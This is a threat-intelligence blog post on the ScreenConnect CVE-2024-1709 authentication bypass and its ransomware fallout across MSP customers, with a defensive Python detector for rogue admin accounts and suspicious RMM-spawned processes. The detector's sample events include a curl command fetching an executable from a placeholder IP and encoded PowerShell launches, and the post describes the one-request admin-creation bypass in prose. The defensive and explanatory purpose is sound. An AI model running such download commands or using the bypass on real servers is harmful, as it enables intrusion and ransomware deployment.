ScreenConnect CVE-2024-1709: The MSP Blast Radius
Threat Intelligence
An authentication bypass in ConnectWise ScreenConnect handed ransomware affiliates direct admin on thousands of MSP servers. The damage propagated through the customers, not the product.
By Arjun Raghavan, Security & Systems Lead, BIPI · May 3, 2024 · 8 min read
On February 19, 2024, ConnectWise disclosed CVE-2024-1709, a critical authentication bypass in self-hosted ScreenConnect (CVSS 10.0), paired with CVE-2024-1708, a path traversal. Within 24 hours, public PoCs were live and ransomware affiliates were mass-exploiting unpatched instances. Because ScreenConnect is the remote-management backbone for managed service providers, every compromised server was a launchpad into dozens or hundreds of downstream small business networks.
Timeline
ConnectWise pushed the patch on February 13 to cloud customers and February 19 to on-prem. Huntress reverse-engineered the patch and published a write-up the next day, including a one-request exploit that created a new admin user via the /SetupWizard.aspx endpoint. By February 22, Huntress was tracking active exploitation across hundreds of MSP environments. Within ten days, Black Basta, Bl00dy, and LockBit affiliates had adopted the bug as their primary initial-access vector during that period.
Root cause: setup wizard trust
The bug was almost embarrassingly simple. The setup wizard endpoint remained reachable after installation and never checked whether setup had already been completed. An unauthenticated POST to that endpoint created a new SuperAdmin account. No elaborate detective work, no chained primitives: one request, full admin, and full code execution via ScreenConnect's built-in scripting.
Attacker actions
Once an affiliate had SuperAdmin, the kill chain was trivial. ScreenConnect lets an admin push arbitrary commands or files to every connected endpoint as SYSTEM. Affiliates used that primitive to deploy ransomware payloads (Black Basta, Bl00dy, LockBit-branded lockers) across all the MSP's customer endpoints simultaneously. For one compromised MSP, that meant 30, 50, or 200 downstream businesses encrypted at the same hour. Some affiliates skipped ransomware entirely and went straight for data theft, dumping QuickBooks files and customer databases from each endpoint.
Detection
The high-fidelity signal was new admin user creation on the ScreenConnect server. Huntress shipped a script to enumerate User.xml on the server filesystem and flag entries that did not match expected staff. The second signal was unusual ScreenConnect script execution: PowerShell payloads, base64 blobs, or curl-to-IP-address commands fanning out to every connected endpoint inside a short window. Any MSP with EDR visibility on customer endpoints saw the same parent process (ScreenConnect.ClientService.exe) spawning unusual children across dozens of tenants at the same moment.
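An added example, not Huntress's script or any ScreenConnect code, that implements both signals over constructed data: it parses a User.xml-style roster and flags accounts missing from the staff list, then looks for suspicious children of ScreenConnect.ClientService.exe appearing across several tenants inside one short window. The User.xml layout, the event record fields, and every sample value are assumptions.

```python
import re
from xml.etree import ElementTree as ET

# Constructed User.xml sample; this layout is an assumption, not ScreenConnect's real schema.
SAMPLE_USER_XML = """<Users>
  <User><Name>jdoe</Name><CreationDate>2023-06-01T09:00:00</CreationDate></User>
  <User><Name>msp-admin</Name><CreationDate>2023-06-01T09:00:00</CreationDate></User>
  <User><Name>x7q2</Name><CreationDate>2024-02-21T03:14:07</CreationDate></User>
</Users>"""

def flag_unexpected_users(xml_text, expected_staff):
    """Signal 1: return (name, creation date) for every account not on the staff roster."""
    root = ET.fromstring(xml_text)
    return [(u.findtext("Name"), u.findtext("CreationDate"))
            for u in root.iter("User") if u.findtext("Name") not in expected_staff]

RMM_PARENT = "screenconnect.clientservice.exe"
# Command-line traits the article names: encoded PowerShell, base64 blobs, download tools aimed at a bare IP.
SUSPICIOUS = re.compile(
    r"(-enc(odedcommand)?\s|frombase64string|"
    r"\b(curl|certutil|wget)\b.*\b\d{1,3}(\.\d{1,3}){3}\b)", re.IGNORECASE)

# Constructed EDR process-creation events (ts = epoch seconds, tenant = downstream customer).
SAMPLE_EVENTS = [
    {"ts": 1000, "tenant": "acme", "parent": "ScreenConnect.ClientService.exe",
     "cmdline": "powershell -nop -w hidden -enc QUJDREVGRw=="},
    {"ts": 1020, "tenant": "bravo", "parent": "ScreenConnect.ClientService.exe",
     "cmdline": "cmd /c curl http://203.0.113.9/a.exe -o a.exe"},
    {"ts": 1045, "tenant": "clinic", "parent": "ScreenConnect.ClientService.exe",
     "cmdline": "powershell -EncodedCommand QUJDREVGRw=="},
    {"ts": 1030, "tenant": "bravo", "parent": "explorer.exe",          # not from the RMM
     "cmdline": "powershell -enc QUJDREVGRw=="},
    {"ts": 5000, "tenant": "acme", "parent": "ScreenConnect.ClientService.exe",
     "cmdline": "powershell -File C:\\rmm\\patch-check.ps1"},            # routine scripted push
]

def detect_fanout(events, window=300, min_tenants=3):
    """Signal 2: first window of `window` seconds in which the RMM client spawned suspicious
    children in >= min_tenants distinct tenants; returns (start_ts, tenants) or None."""
    hits = sorted((e for e in events if e["parent"].lower() == RMM_PARENT
                   and SUSPICIOUS.search(e["cmdline"])), key=lambda e: e["ts"])
    for i, first in enumerate(hits):
        tenants = {e["tenant"] for e in hits[i:] if e["ts"] - first["ts"] <= window}
        if len(tenants) >= min_tenants:
            return first["ts"], sorted(tenants)
    return None

if __name__ == "__main__":
    print(flag_unexpected_users(SAMPLE_USER_XML, {"jdoe", "msp-admin"}))
    print(detect_fanout(SAMPLE_EVENTS))
```

The benign patch-check push and the non-RMM PowerShell launch are deliberately left unflagged, which is the distinction that keeps this rule from paging on every routine script deployment.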
Lessons
The product was the supply chain. MSPs sit in a structurally privileged position: one compromise reaches every customer. That model demands the controls customers normally reserve for their own crown jewels: MFA on every admin account, conditional access by IP, alerting on new admin creation, network egress allowlists, and out-of-band patching SLAs measured in hours. Several MSPs hit during this wave did not have MFA on ScreenConnect at all. MFA would not have stopped the auth bypass itself, but it would have blunted post-patch reuse of leaked admin credentials.
The second lesson is for the downstream customers. If your MSP gets to push code to your endpoints, your endpoint security posture is gated on theirs. Asking your MSP for evidence that ScreenConnect, NinjaOne, Kaseya, or whatever they use is patched, MFA-enforced, and logged is reasonable due diligence, not paranoia.
The BIPI take
RMM tools are the highest-leverage targets in the SMB ecosystem. The CVE-2024-1709 wave was not novel tradecraft; it was the predictable consequence of concentrating remote SYSTEM execution across thousands of organizations in a small number of self-hosted servers. Treat your RMM the way you would treat a domain controller. Treat your MSP's RMM the way you treat any vendor that can run code in your environment, which is to say: with a contract clause and a question list.